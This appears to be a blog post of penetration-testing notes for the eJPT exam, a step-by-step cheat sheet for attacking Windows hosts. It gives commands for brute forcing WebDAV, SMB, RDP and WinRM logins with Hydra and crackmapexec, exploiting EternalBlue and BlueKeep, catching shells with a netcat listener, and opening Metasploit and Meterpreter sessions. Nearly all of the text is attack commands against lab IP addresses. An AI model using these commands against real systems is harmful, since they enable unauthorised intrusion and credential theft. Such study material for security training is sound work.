Exploiting Microsoft IIS WebDAV
Quick Scan to Check Open Ports and Services:
nmap -sV -sC 10.10.10.10
//Quick scan to identify open ports and services on the target.
Brute Forcing WebDAV:
nmap -sV -p 80 --script=http-enum 10.10.10.10
Identifying the /webdav/ directory and attempting brute force with Hydra.
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_password.txt 10.10.10.10 http-get /webdav/
//Hydra used to perform a dictionary attack on the /webdav/ directory.
Exploiting SMB with PsExec
SMB Login Brute Force:
msfconsole
[MODULE]> auxiliary/scanner/smb/smb_login
//Brute forcing SMB login credentials with Metasploit.
Automated SMB Login with Metasploit:
msfconsole
[MODULE]> exploit/windows/smb/psexec
Exploiting Windows MS17-010 SMB (EternalBlue)
Checking for MS17-010 Vulnerability:
nmap -sV -p 445 -O 10.10.10.10
nmap -sV -p 445 10.10.10.10 --script=smb-vuln-ms17-010
//Quick scan and Nmap script to identify the MS17-010 vulnerability.
Manual Exploitation with EternalBlue:
nc -nlvp 4444
python eternalblue_exploit8.py 10.10.10.10 eternalblue_exploit8.pyManual exploitation using the EternalBlue exploit script.
Automated Exploitation with Metasploit:
msfconsole
[MODULE]> exploit/windows/smb/ms17_010_eternalblue
//Automating the exploitation of MS17-010 vulnerability with Metasploit.
Exploiting RDP
Checking for RDP:
nmap -sV -O 10.10.10.10
//Quick scan to identify if RDP is enabled on the target machine.
Brute Forcing RDP Credentials:
hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
//Brute forcing RDP credentials with Hydra.
Connecting to RDP
xfreerdp /u:Administrator /p:helloworld /v:10.10.10.10
//Connecting to RDP with xfreerdp after obtaining credentials.
Exploiting Windows CVE-2019-0708 RDP(BlueKeep)
Checking for BlueKeep Vulnerability:
nmap -p 3389 10.10.10.10
//Quick scan to identify the BlueKeep vulnerability.
Exploiting BlueKeep with Metasploit
msfconsole
[MODULE]> auxiliary/scanner/rdp/cve_2019_0708_bluekeep
//Identifying and exploiting the BlueKeep vulnerability using Metasploit.
Exploiting WinRM
To initiate a quick scan for WinRM, use the following command:
nmap -sV -p 5985 10.10.10.10
Brute Forcing WinRM Credentials:
To perform a brute force attack on WinRM credentials using crackmapexecuse:
crackmapexec winrm 10.10.10.10 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Executing commands with -xoption:
crackmapexec winrm 10.10.10.10 -u administrator -p tinkerbell -x "whoami"
Starting a Session with evil-winrm.rb:
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.24.138
Creating a Meterpreter Session with Metasploit:
msfconsole
[MODULE]> exploit/windows/winrm/winrm_script_exec
After establishing a session, you can gather system information using:
meterprete> sysinfo
Conclusion
In this comprehensive exploration of system and host-based attacks, Amr Elsagaeishares invaluable insights and notes on exploiting diverse Windows vulnerabilities. Covering everything from web services to SMB and RDP, these techniques shed light on the myriad avenues attackers may explore. It's crucial to approach ethical hacking with a sense of responsibility and adhere to high ethical standards to ensure the integrity of security testing.
Best of luck on your eJPT adventure!
Leave a comment
Your email address will not be published. Required fields are marked *